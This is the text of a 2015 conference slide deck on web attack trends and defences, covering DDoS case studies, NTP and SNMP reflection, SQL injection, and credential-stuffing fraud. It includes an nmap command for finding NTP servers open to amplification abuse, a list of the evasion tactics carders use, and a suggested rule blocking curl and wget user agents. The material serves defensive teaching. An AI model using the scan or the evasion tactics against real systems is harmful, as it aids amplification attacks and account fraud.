Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
NTXISSACSC3 - Cyber Warfare: Identifying Attackers Hiding Amongst the Flock by Anthony Lauro
1. @NTXISSA #NTXISSACSC3
Cyber Warfare: Identifying Attackers
Hiding Amongst the Flock
Anthony Lauro
Sr. Enterprise Security Architect
Akamai Technologies, Inc
October 3rd, 2015
2. @NTXISSA #NTXISSACSC3
Who am I? (unphilosophically speaking)
About me:
• Anthony Lauro | CISSP, GWAPT
• Sr. Enterprise Security Architect Akamai
Technologies, Inc
• 16 years Information Security Experience
• Advise Akamai clients on Cybersecurity Resilience
• Lead Application Security training for Enterprise
Security Architecture team @Akamai
• Attended CCCC a long, long time ago…
15. @NTXISSA #NTXISSACSC3
2014 Attack Trends
• Top three attack vectors are
application layer attacks
• Defacement leads as the top
attack, followed by
SQLi and Account Hijacking
as the most prevalent attacks
seen in 2014
Source: Stateoftheinternet.com
16. @NTXISSA #NTXISSACSC3
Login Abuse: Account Checker Attacks
The fuel for any account checker is a list of credentials.
Fortunately for attackers, there are a huge number of credentials
that are public.
• 38,000,000 Adobe accounts
• 318,000 Facebook accounts
• 70,000 Google accounts
• 60,000 Yahoo accounts
• 22,000 Twitter accounts
• 8,000 ADP accounts
• 8,000 LinkedIn accounts
23. @NTXISSA #NTXISSACSC3
Approaches for Web Security
On-Premise Hardware
Router
Firewall
Load
balancer
Bandwidth
Application Protection
Cloud Service
Cloud
Platform
ISPs
Internet Service Providers
24. @NTXISSA #NTXISSACSC3
On-Premises Web Security Approach
On-Premise Hardware
Router
Firewall
Load
balancer
Bandwidth Bandwidth Constraint
Connection & Processing Limitations
Application Vulnerability Exploitation
“Have to ingest ALL traffic before a
Yes/No decision can be made”
Performance Degradation
Throughput of devices cannot meet
volume / requests per second of good
and bad traffic spikes.
Reliability
WAF configurations are complex
often not tuned properly or not in
blocking mode.
Accuracy
25. @NTXISSA #NTXISSACSC3
I put the WAF on
a SPAN port.
I was afraid of
blocking
legitimate traffic!
How did this
breach
occur, we
have a WAF!!
26. @NTXISSA #NTXISSACSC3
Internet Service Provider Approach
ISPs
Internet Service Providers
DDoS Only Protection
False Positives/ Upstream Blacklisting
Single-Homed Protection
Carrier Dependent Architecture
Capacity Issues At Scale
28. @NTXISSA #NTXISSACSC3
Application Protection
Cloud Service Approach
Application Protection Cloud Service
Cloud
Platform
Direct-to-Origin DDoS Protection Gap
Shared Infrastructure (Capacity Constraints)
Acceptable Use Monitoring Challenge
Retaining Real-time Visibility
Not Always Enterprise Class Protection
29. @NTXISSA #NTXISSACSC3
“In other words, careful where you aim that gun,
#OpISIS, because it might point back at you as
well.” -Mike Masnick TechDirt
33. @NTXISSA #NTXISSACSC3
For Internet-facing Applications
Internet
Web
Retrieval and integrity
of content and data
Origin
Supporting infrastructure and
other applications
DNS
Finding the application
Datacenter User
34. @NTXISSA #NTXISSACSC3
Multiple Perimeters
For Internet-facing Applications
Volumetric Protection
• Massive resiliency
• Thousands of points of presence
• Distributed geographically
• Rate controls for noisy requestors
Attacks Against CNAMEs
• Network and application layer filtering capable
• Protocol validation/Filtering
• SSL decrypt – re-encrypt
• Geo Sensing and Filtering Capable
• Capacity: Throughput & P/ps
Attacks Against Datacenter IP’s
• Direct to origin protection using BGP redirection
• Multiple globally distributed scrubbing centers
• Attack capacity to withstand multiple attacks at once
• Good traffic bypass as not to degrade performance
35. @NTXISSA #NTXISSACSC3
Multiple Perimeters
For Internet-facing Applications
Application Layer Attacks
SSL decryption at scale
Risk scoring rule sets
Tune accuracy over time
Attacks Against DNS
Rate Controls - Connection Throttling
White Listing
Application Inspection
DNSSEC
Client/Server Locks
Anycast Responses
Event Visibility
Threat intel gathered and validated against global dataset
Real-Time event correlation between security policies
Ability to identify hosts based on previous malicious behavior
Import log feed from ‘cloud’ into internal SIEM for correlation
38. @NTXISSA #NTXISSACSC3
• Use behavioral data to protect your
castle
•Collect and correlate attack traffic into a
large dataset from across the web
•Identify bad clients based on past behavior
•Define a risk score for malicious clients
•Filter malicious client based on risk score
CLIENT REPUTATION SCORING
39. @NTXISSA #NTXISSACSC3
Information Intelligence
Raw, unfiltered feed Processes, sorted information
Aggregated from virtually every
source
Aggregated from reliable sources and
cross correlated for accuracy
May be true, false, misleading,
incomplete, relevant or irrelevant
Accurate, timely, complete, assessed
for relevancy
Not actionable Actionable
InfoSec teams are swimming in data
More raw “information” is not the solution
42. @NTXISSA #NTXISSACSC3
Case Study: 320 Gbps DDoS Attack:
Gaming Vertical, APAC Region
• Largest attack ever mitigated by Akamai
against single customer
• Targeted primary website, supporting
network infrastructure, and DNS
• Multiple attack vectors:
• SYN/UDP floods - entire subnet
• Volumetric attack against DNS
• Attack characteristics:
• 320 Gbps and 71.5 Mpps peak traffic
• 2.1 million requests/s against DNS
43. @NTXISSA #NTXISSACSC3
138
232
321
155
177
312
4
198
217
30
8
35 33
70
3
2
1.5
One Attack in a Broader DDoS Attack Campaign
Start End
Infrastructure (Gbps) authDNS (Mpps) DNS Reflection (Mpps)Web (Gbps)
21 + Day campaign against single customer
• 39 distinct attacks targeting applications and DNS infrastructure
• Eight attacks >100 Gbps including record 320 Gbps attack
44. @NTXISSA #NTXISSACSC3
Grow revenue opportunities with fast, personalized
web experiences and manage complexity from peak
demand, mobile devices and data collection.
Opening
Ceremony
1st day of sports
• 132 BILLION requests
processed by our WAFs
• 10x more than 2010 Winter
Olympics
• WAF rules triggered
• 127x more than 2010 Winter
Olympics
• Custom Rules Triggered:
166,000,000
• Rate Controls (Adaptive Rules)
Triggered: 5,600,000
• Requests Denied: 182,200,000
45. @NTXISSA #NTXISSACSC3
Grow revenue opportunities with fast, personalized
web experiences and manage complexity from peak
demand, mobile devices and data collection.
0
100
200
300
400
500
Attack traffic…
0
50000
100000
150000
200000
250000
300000
Spain to
Netherlands
0
100
200
300
400
500
600
-500
500
1500
2500
3500
4500 Chile to…
Australia…
0
2000
4000
6000
8000
10000
12000
14000
16000
Ivory Coast
to Japan
3-1
1-5
1-2
3-1
Opening ceremony
46. @NTXISSA #NTXISSACSC3
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and
sophistication of web attacks.
Web Application Attacks by Industry – Q1 2015
47. @NTXISSA #NTXISSACSC3
• Reflection attack
• Mostly SNMP v2c devices (~3+ years old) with default
“public” community string
• Routers, printers, cable modems, NAS
• New tool automates sending getBulkRequest to open
SNMP servers.
• Flood of SNMP GetResponse data sent from reflectors to
victim on port 80
• SNMP query begins at highest (OID) tree level to obtain
largest possible response
The Attack du jour?
49. @NTXISSA #NTXISSACSC3
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and
sophistication of web attacks.
Case Study: NTP Attacks on Origin
500X
RETURN RATE
INTRAFFIC
>100GBPS
ATTACK TRAFFIC
AGAINST ORIGIN
1,000+
INCREASE INHITS PER
SECOND AGAINST ORIGIN
AttackVector
Requestwith spoofedsourceIP of target serversentto a vulnerableNTP serverthat
allowsthemonlistfunction.
NTP serverrepliesbackto the targetIP, direct to origin,at massivescale.
50. @NTXISSA #NTXISSACSC3
Use nmap NSE Script:
identify vulnerable hosts
Example: nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>
• The monitor list in response to the monlist command is limited to 600
associations.
• The monitor capability may not be enabled on the target in which case you may
receive an error number 4 (No Data Available).
• There may be a restriction on who can perform Mode 7 commands (e.g. "restrict
noquery" in ntp.conf) in which case you may not receive a reply.
• This script does not handle authenticating and targets expecting auth info may
respond with error number 3 (Format Error).
52. @NTXISSA #NTXISSACSC3
DNS Attack Targeting Akamai Customer
• DNS requests peaked at 168k per second.
• 19B hits in 5 days. Normally serve ~30M hits per week.
53. @NTXISSA #NTXISSACSC3
DNS Hijacks Attacks:
Common Tactic for Middle Eastern Attackers
• Client DNS Locks
• clientUpdateProhibited
• clientTransferProhibited
• clientDeleteProhibited
• Registrar locks
• serverUpdateProhibited
• serverTransferProhibited
• serverDeleteProhibited
US DoD’s DNS Hijacked
Best Practice DNS Locks
54. @NTXISSA #NTXISSACSC3
RFI Attempt to pull click.php file from
remote location
Using RFI vuln in TimThumb Plugin
Remote File Inclusion
55. @NTXISSA #NTXISSACSC3
Here’s what click.php is really about!
HTTP(s) Redirections can fluctuate between 14-20
different pay4click companies and advertiser’s and that
means precious bitcoin revenue for the attacker and his
friends.
http://www.secureworks.com/cyber-threat-intelligence/threats/ppc-hijack/
56. @NTXISSA #NTXISSACSC3
When good things go bad:
Rogue Reseller to Competitor
“After years of this relationship we recently found that they now have a copycat site and are selling
our products that they are now manufacturing on their own.” – Enterprise Manufacturing Customer
“At first they were just scraping our site and we saw it to be mutually beneficial…”
57. @NTXISSA #NTXISSACSC3
Blind SQL Injection: Time Based Attack
This type of blind SQL injection relies on the database pausing for a specified amount of time and examining
the results. Using this method, an attacker enumerates each letter of the desired piece of data.
Client Request
58. @NTXISSA #NTXISSACSC3
SQL Injection Analysis
2000 customers over one week
SQL Injection Attacks %
HTTP 8,137,681 96.6
HTTPS 287,808 3.4
Total 8,425,489 100
Protocol Breakdown
Breakdown by Intent
Source: Akamai CSI
62. @NTXISSA #NTXISSACSC3
ACCOUNT CHECKERS: CARDERS
Several techniques are used to avoid
detection and mitigation, including:
● Randomization of UserAgent header
● Targeting of alternative (mobile/API/legacy) login
pages, which may have weaker mitigation controls
and are often overlooked by the customer.
● Attacks originate from highly distributed set of IP
addresses, with different source countries.
● Use of low request rates to evade rate controls.
● Change in order of headers.
● Changes in tactics when 403 responses are
received.
63. @NTXISSA #NTXISSACSC3
Fraud – Vietnamese Carders
Carder TTP
• Build Tools Server
• Cultivate List of Open Proxies
• Acquire Compromised Logins
• Check/Alter Compromised Accounts
• Make Fraudulent Purchases
• Cash out/Resell gift cards
65. @NTXISSA #NTXISSACSC3
Login Abuses: TTPs and Defenses
Rate controls to block fast moving scripts
• Attack relies on being able to check thousands of accounts quickly
• Blocking aggressive scripts prevents login exploitation
Internal monitoring for changes to customer accounts
• Email address
• Shipping address
• Same email on multiple accounts
Geo blocklists for areas where there is no business
• Cuts down on the places attackers can launch from
• Do cloud server providers need to access your webpage?
Custom rules to block User-Agent strings (or lack thereof)
• Attack scripts are often simple and will contain only “curl” or “wget”
• Sometimes none at all
69. @NTXISSA #NTXISSACSC3
Looking Forward into 2015
• Industry Verticals
• Gaming, Fiserv, Internet & Telecom, Software & Tech, and Media verticals expected
to be targeted heavily in 2015
• Security vulnerabilities continue to increase due to bespoke/custom applications
• Good history of successful attacks
• DDoS Attacks
• Expect more ‘mega’ attacks > 100Gbps
• Commoditization of DDOS attacks
• IPv6 uptake to increase DDoS vector
• Never pay ransoms, but do have a plan
• APPLICATION ATTACK TRENDS
• APPSEC IS FAILING – NEED HELP!
• IF YOU DON’T HAVE AN APPSEC PROGRAM
START ONE!
• INJECTION & XSS RIDE OWASP TOP 10
• SESSIONS MGMT – YOURE DOING IT WRONG
• DEVELOPERS – YOU’RE BEHIND!
70. @NTXISSA #NTXISSACSC3
1. You Need ’Validated’ Data
To derive intelligence on current & evolving threats.
2. Scale, Availability & Resilience
To be high performing, take the punches, & stay online.
3. A Plan
To understand how to respond to bad day scenarios.
4. Control & Flexibility
To adapt your defenses dynamically.
Cyber Security Requirements:
5 Points To Take Away
5. People & Experience
To execute every time you come under attack.
71. @NTXISSA #NTXISSACSC3
RESOURCES
OWASP: OPEN WEB APPLICATION SECURITY PROJECT
https://www.owasp.org/index.php/Main_Page
BSIMM5: BUILDING SECURITY IN MATURITY MODEL v5
https://www.bsimm.com/
SANS SWAT: SECURING WEB APPLICATION TECHNOLOGIES v1.1
http://software-security.sans.org/resources/swat
CERT: SECURE CODING STANDARDS
http://www.cert.org/secure-coding/research/secure-coding-standards.cfm?
AKAMAI TECHNOLOGIES (HEY, WHY NOT)
https://www.akamai.com/us/en/cloud-security.jsp
73. @NTXISSA #NTXISSACSC3@NTXISSA #NTXISSACSC3
The Collin College Engineering Department
Collin College Student Chapter of the North Texas ISSA
North Texas ISSA (Information Systems Security Association)
NTX ISSA Cyber Security Conference – October 2-3, 2015 73
Thank you